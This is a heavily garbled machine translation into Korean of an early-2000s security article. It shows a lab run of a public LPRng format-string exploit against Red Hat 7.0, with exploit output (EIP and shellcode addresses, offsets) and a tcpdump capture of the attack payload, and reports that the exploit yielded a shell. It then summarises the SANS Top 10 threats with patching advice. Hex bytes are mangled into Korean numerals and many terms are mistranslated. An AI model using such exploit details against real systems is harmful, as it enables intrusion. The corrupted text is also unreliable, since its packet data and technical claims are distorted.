sans 톱 10을 악용하여 실행 크래커

이 문서에서 다루는 내용을 보면 우리는 크래커을 악용하여 실행합니다. 우리는 또 한번보세요 sans 10 장 중요한 인터넷 보안 위협 목록입니다.

악용

정찰가 필수적으로 파악 무엇이 열려 있고 무엇이 폐쇄됩니다. 의 다음 단계는 과자가 실제로 방학에가있는 컴퓨터 네트워크를합니다. 크래커에 운영 체제의 약점을 악용하여이 작업을 수행할 서비스입니다.

많다 악용하고있습니다; 찾을 수있는 권한을 악용할 수있는 두통입니다. 되지 않는 모든 악용이 만들어집니다 동등합니다. 이로써, 나는 것을 의미 장을 악용하는 운영 체제에 의존합니다. 그냥 프린터를 악용하기 때문에이있는 라인을 의미하는 것이 작업에 대한 리눅스하지 않는다 solaris, 그 반대입니다.

an 악용이 무엇인지 설명하는 데 도움과 같습니다가 실행될 때, 나는이 문서에 포함된 출력에서 착취와 일부 패킷에 관여 악용합니다. 먼저, 조금 배경을 악용 나는 실행을하기로했다. 2000 년 말, 조사 활동을 증에서 포트 515 (라인 프린터 포트)입니다. 이것이 관계를 악용의 빨간 모자 7.0 라인 프린터 데몬입니다. 당시는이 쓰기, 나는 아직도 많은 프로브이 서비스에 대한보고에 내 방화벽이있습니다.

나는 내용은 악용하려는 경우를 사용, 그것 http://www.netcat.it에서 찾을 수있습니다.

다음은 일부 재생하여 재생 목록을 약속과 함께 각 :

  + + + www.netcat.it 원격 악용에 대한 lprng / lpd 

  + + + 악용 정보 

  + + + 피해자 : 192.168.1.25 

  + + + 종류 : 0 - redhat 7.0 - guinesss 

  + + + eip 주소 : 0xbffff3ec 

  + + + shellcode 주소 : 0xbffff7f2 

  + + + 위치 : 300 

  + + + 정렬 : 2 

  + + + 오프셋 0 

  + + + 공격 192.168.1.25으로 우리의 형식 문자열 

  + + + 약하므 강제 남자, 편안하고 즐길 타고; > 

에서이 출력, 우리가 알고있는 착취가 공격에 빨간색 모자 7.0 라인 프린터 (종류 0 - redhat7.0 - guinesess)입니다. 이 공격하는 방법을보실 수 tcpdump보기 원하는가?

  18:34:19.991789> 192.168.1.5.2894> 192.168.1.25.printer :의 4221747912:4221747912 (0) 승 

  32120 <mss 1460,sackok,timestamp 4,058,996 0,nop,wscale 0> (df) (ttl 64 아이다호 11263) 

  4500입니다 2bff 사영영영 사영영육 8b4e c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c8 공공공공 공공공공 

  a002 7d78 8bb1 공공공공 공이공사 05b4 0402 080a 

  003을 개발 ef74 공공공공 공공공공 공일공삼 공삼공공 

  18:34:19.993434 <192.168.1.25.printer> 192.168.1.5.2894 :의 397480959:397480959 (0) 응답 

  4221747913 윈 32120 <mss 1460,sackok,timestamp 393475 4058996,nop,wscale 0> (df) (ttl 64, 

  id 3278) 

  4500입니다 0cce 사영영영 사영영육 aa7f c0a8 0119 

  c0a8 영일영오 영이영삼 0b4e 17b1 13ff fba2 c2c9 

  a012 7d78 5ee7 공공공공 공이공사 05b4 0402 080a 

  영영영육 영일영삼 003d ef74 영일영삼 영삼영영 

  18:34:19.993514> 192.168.1.5.2894> 192.168.1.25.printer :합니다.  1:1 (0) 응답 1 승 32120 <nop, 

  nop, 타임 스탬프 4,058,996 ,393,475> (df) (ttl 64 아이다호 11264) 

  사오영영 영영삼사 2c00 사영영영 사영영육 8b55 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400 

  8010 7d78 8dac 영영영영 영일영일 080a 003d ef74 

  영영영육 영일영삼 

  18:34:19.999662 <192.168.1.25.printer> 192.168.1.5.2894 : p 1:31 (30) 응답 1 승 32120 

  <nop, nop, 타임 스탬프 삼구삼사칠육 사영오팔구구육> (df) (ttl 64 아이다호 3279) 

  사오공공 공공오이 0ccf 사영영영 사영영육 aa68 c0a8 0119 

  c0a8 영일영오 영이영삼 0b4e 17b1 1400 fba2 c2c9 

  8018 7d78 3e5b 영영영영 영일영일 080a 영영영육 영일영사 

  003을 개발 ef74 6c70 643a 203a 204d 616c 666f 

  726 개발 육오육사 이영육육 726f 6d20 육일육사 육사칠이 육오칠삼 

  730 a 

  18:34:19.999686> 192.168.1.5.2894> 192.168.1.25.printer :합니다.  1:1 (0) 응답 31 승 32,120 <nop, 

  nop, 타임 스탬프 4,058,997 ,393,476> (df) (ttl 64 아이다호 11265) 

  사오영영 영영삼사 2c01 사영영영 사영영육 8b54 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e 

  8010 7d78 8d8c 영영영영 영일영일 080a 003d ef75 

  공공공육 공일공사 

  18:34:20.000863 <192.168.1.25.printer> 192.168.1.5.2894 : f 31:31 (0) 응답 1 승 32120 

  <nop, nop, 타임 스탬프 삼구삼사칠육 사공오팔구구칠> (df) (ttl 64 아이다호 3280) 

  사오공공 공공삼사 0cd0 사영영영 사영영육 aa85 c0a8 0119 

  c0a8 영일영오 영이영삼 0b4e 17b1 141e fba2 c2c9 

  8011 7d78 8d8b 영영영영 영일영일 080a 영영영육 영일영사 

  003을 개발 ef75 

  18:34:20.000878> 192.168.1.5.2894> 192.168.1.25.printer :합니다.  1:1 (0) 응답 32 승 32,120 <nop, 

  nop, 타임 스탬프 4,058,997 ,393,476> (df) (ttl 64 아이다호 11279) 

  사오공공 공공삼사 2c02 사영영영 사영영육 8b53 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f 

  8010 7d78 8d8b 영영영영 영일영일 080a 003d ef75 

  공공공육 공일공사 

  18:34:20.049095> 192.168.1.5.2894> 192.168.1.25.printer : p 1:424 (423) 응답 32 승 32120 

  <nop, nop, 타임 스탬프 4,059,002 ,393,476> (df) (ttl 64 아이다호 11267) 

  4500 01데시벨 2c03 사영영영 사영영육 89ab c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f 

  8018 7d78 54c5 영영영영 영일영일 080a 003d ef7a 

  공공공육 공일공사 사이사이 f0ff ffbf f1ff ffbf f2ff 

  ffbf f3ff ffbf 오팔오팔 오팔오팔 오팔오팔 오팔오팔 오팔오팔 

  오팔오팔 오팔오팔 오팔오팔 오팔오팔 252e 삼일삼칠 삼육칠오 이오삼삼 

  3030 246e 252e 삼일삼삼 칠오이오 삼삼삼공 삼일이사 6e25 

  이 e32 삼오삼삼 칠오이오 삼삼삼공 삼이이사 6e25 2e31 3932 

여기에 무슨 일이 살펴 봅시다. 먼저, 우리가 볼 192.168.1.5, 192.168.1.25을 시도하기는 연결을 사용하여 tcp 전형적인 3 - 방식 핸드입니다. 에 대한 다음 시퀀스의 이벤트, 우리가 볼 192.168.1.5 시도를 실행하는 데 악용와의 192.168.1.25. 마지막으로, 우리가 볼 192.168.1.5 밀어 423 바이트의 데이터를 192.168.1.25. 는 그 익스플 계속이 한동안 때까지는 약하므 - 강제로 악용할 수있습니다.

이 익스플로 잇은 근무를 192.168.1.25 제공 나에게는 쉘 (필요할 것으로 생각하지 않습니다), 그리고 나는 무엇 사상 싶었다 수있다.

크래커 무단으로 시스템을 악용하는 방식입니다. 자신을 보호하기 위해 반대하면 패치와 함께 사용자의 운영 체제를 업데이 트해야합니다. (이 상태에 대한 모든 시스템입니다.)

가 sans 상위 10

가 sans 상위 10 장 중요한 인터넷 보안 위협의 목록은 컴퓨터 네트워크의가 장 일반적인 악용을 찾을 수있습니다. 어떻게하면이 목록을 너무 소중한는 사실이 그룹 시스템 관리 네트워크 보안을 제공하는 목록은 관련 5467 항목 (일반적인 취약점과 취약성), 그래서 사람이 더 많은 연구를 수행할 수있습니다 필요한 경우입니다. 이리스트는 컴파일하여 sans의 도움으로 많은 보안 전문과 보안 커뮤니티입니다.

http://www.cve.mitre.org/가 5467 데이터베이스에서 찾을 수있습니다.

을 읽고 더 많은를 sans 기 10, 방문 http://www.sans.org/topten.htm.

의 첫 번째 악용 목록에 상위 10는 바인드합니다. 바인딩은 프로그램을 사용하는 서버 (하는 데 도움이 해결 이름을 주소)을 인터넷을 통해 사용하고있다. 지난 몇 년 동안, 주요 구멍이 발견은 여러 버전의 바인드합니다. 모든 사람을위한 것이 중요합니다 바인딩을 실행하여 항상 최고의 최신 보안 취약점을 유지합니다. 일 2001년 1월 29일, 네트워크 어소 창설 더 많은 보안 취약점을 발견했다고 발표했다 관련된 바인드 버전 4를 구속할 버전 8. 패치를 출시했습니다을하실 수있습니다 사용자의 운영 체제 공급 업체의 웹 사이트에서 다운로드합니다.

을 원하실 경우 nai 발표한 논문을 읽어를받을 수있습니다 여기 : http://www.pgp.com/aboutus/press/pr_template.asp?pr=/pressmedia/01282001-a.asp&sel = 900하거나 읽을 수있습니다 cert 자문을 http://www.cert.org/advisories/ca-2001-02.html.

두 번째 익스플로 sans 상위 10 취약 패턴을 프로그램입니다. 이들이 주위에 대한 년,들이의 주요 원인은 대부분의 해킹 웹 사이트가 주류로 주목을 받게됩니다.

대부분의 이러한 패턴 - 상자 프로그램을 남길 샘플 프로그램 설치 후이 취약하고 악의있는 사용자를 구하는 "루트"액세스합니다. 공격자가 수준의 액세스 권한을 얻는 경우, 그는 그 기쁘게 수행할 수있습니다 (포함 변경에 웹 사이트)입니다. 나는 일부 링크가 제공에 관한 더 자세한 정보를 얻으려면 패턴 - 상자 공격을합니다. 이 목록은 포괄하지 않습니다; dig 조금 더주십시오 있다고 생각되는 경우는 공격에 취약합니다.

더 많은 정보에서 찾을 수있습니다 패턴 - 상자 공격으로부터 http://www.cert.org/advisories/ca-1997-24.html, http://www.cert.org/advisories/ca-1996-11.html , 또는 http://www.cert.org/advisories/ca-1997-07.html.

제 3 악용 취약 원격 프로 시저 호출 (rpc). rpc를 허용 c 프로그램을 만드는 프로 시저를 호출을 네트워크를 통해 다른 컴퓨터에있습니다. 대부분의 공급 업체가 패치를하는 데 도움이 조이 다운 rpc 서비스를 제공합니다. 그럼에도 불구하고가 장 좋은 정책과 관련이 서비스는, 필요하지 않으면, 다음을 죽이는 것이있습니다. 추신 - 효율적으로 실행할 수있습니다 | grep rpc를 찾아 해당 프로세스 아이디 (pid)를 입력한 다음 실행을 죽이는 -9 pid. rpc 서비스를 사용하지 않도록 할 수도있습니다 언제 시작하는 즉시 대부분의 유닉스 운영 체제를 변경하여 시작 파일 (위치한 / 기타 / rc.d /)에서의 (시동)을 k (살해). 확인할 수있습니다 rpc 프로그램이 실행하여 rpcinfo - p.

더 많은 정보에서 찾을 수있습니다 rpc 공격으로부터 http://www.cert.org/incident_notes/in-99-04.html.

제 4 악용에 sans 상위 10 개 목록은 원격 데이터 서비스가 보안 구멍에 취약 iis입니다. (솔직히, 나는 놀란 위로가들은 더 많은 보안 취약점에 상위 10 개입니다.) 나는 이것을 악용할 수 합계 최대 다루는 정말 빠른… 패치가 귀하의 iis입니다.

더 많은 정보에서 찾을 수있습니다 rds 보안 홀에서 http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2.

제 5 악용 메일 전송과 마임 공격에 취약합니다. 이러한 취약점과 관련하여 버퍼 오버플로우 공격을하는 파이프는 물론 즉각적인 루트 타협을 활성화합니다. 있는 몇가 지 방법을 확보 이러한 문제 영역입니다. 첫 번째는 유지하려면 올바른 패치에 대한 귀하의 메일 전송 / 메일 서버입니다. 경우 이러한 서비스 중 하나를 실행할 필요가없습니다 해제할 수있습니다 그들 (다음과 같은 절차로 철자가 아웃에 대한 rpc).

메일 전송에 대한 자세한 정보를보실 수있습니다 보안 홀에서 http://www.cert.org/advisories/ca-97.05.sendmail.html.

제 6 악용 취약 sadmind와 mountd. 이 취약점을 적용 리눅스 기계는 물론 solaris 기계입니다.

에 대한 자세한 내용은 sadmind와 mountd 보안 구멍을 보려면 http://www.cert.org/advisories/ca-99-16-sadmind.html 또는 http://www.cert.org/advisories/ca-1998.12 . mountd.html.

제 7 악용의 상위 10는 전 세계를 파일 공유를 사용하여 netbios 포트를 135-139). 이것은 아마도가 장 큰 보안 문제는 사용자가 이러한 경우에 연결되어있는 케이블 모뎀이나 dsl. 대부분의 개념을 이해하지 못하는 파일 공유와 떠나는 파일 공유를 활성화합니다. 또 다른 문제는 냅스터. 냅스터가 여기에 나와 있지 않지만, 그것은 사람을 필요로 이어질 수있는가 공유 디렉토리 및 공유를 더욱 그런 다음 필요합니다. 어떻게 우리가 올바른가? 이러한 제안 사항은 사이트에서 sans http://www.sans.org/topten.htm :

대답을 공유하면 탑재된 드라이브를 보장에만 필요한 디렉터리가 공유합니다.

b.들에 대한 보안을 허용하여 특정 주소를 공유만이 이름을하실 수있습니다 스푸핑 때문입니다.

3에 대한 windows 시스템, 보장 모든 주식은 강력한 암호로 보호합니다.

d.에 대한 windows nt 시스템, 예방의 익명 열거 사용자, 그룹, 시스템 구성 및 레지스트리 키를 통해 "널 세션"연결합니다.

블록 인바 운드 연결을 netbios 세션 서비스 (tcp 139)를 라우터나 nt 호스트입니다. 고려 구현에 restrictanonymous 레지스트리 키에 대한 인터넷 - 연결된 호스트의 독립형 또는 비 - 신뢰할 수있는 도메인 환경입니다.

제 8 악용이 약한 암호입니다. 더 이상 말할 필요가 있습니까? 어떤 형태의 위험을 평가, 하나의가 장 일반적인 취약점을 나는이 약한 암호를 참조하십시오. 시 앞두고있는 비밀 번호를 기억하기 위해 다음의 간단한 지침 :

- 있는지 확인합니다 비밀 번호는 8 자 길이입니다.

- 있는지 확인합니다 비밀 번호는 조합의 숫자, 특수 문자, 영숫자 문자입니다.

- 선택에서 비밀 번호가 아닌 사전의입니다.

에 대한 자세한 내용은 비밀 번호가 강점을 보려면 http://www.cert.org/tech_tips/passwd_file_protection.html.

아홉째, 팝 버퍼 오버플로 취약점을 악용이입니까 또는 잘못된 구성합니다. 다시 이러한 공격으로부터 자신을 보호하는 최선의 방법은이 서비스를 사용하지 않도록 설정이 필요하지 않은 경우가있습니다. 또한, 최신 패치를 적용합니다 (이 필요하면이 서비스를 실행하려면).

에 대한 더 많은 정보와 팝입니까 보안 페이지를 방문하십시오 http://www.cert.org/advisories/ca-1998.09.imapd.html, http://www.cert.org/advisories/ca-1998.08. qpopper_vul.html, 또는 http://www.cert.org/advisories/ca-1997.09.imap_pop.html.

최종 악용의 sans 톱 10은 기본 라이언 커뮤니티 문자열을 설정하여 "공개"와 "개인"입니다. 함께 약한 암호,이 취약점에 의해 통제 기본적인 행정 수있습니다.

라이언 및 커뮤니티 문자열에 대한 더 많은 정보를 참조하십시오 http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm # xtocid210315.

이들은 아니라는 것을 염두에 두어야합니다에만 취약점의 웹입니다. a 과자를 사용하지 악용 그는 그의 주머니의 트릭에 대해 귀하와 귀하의 네트워크입니다.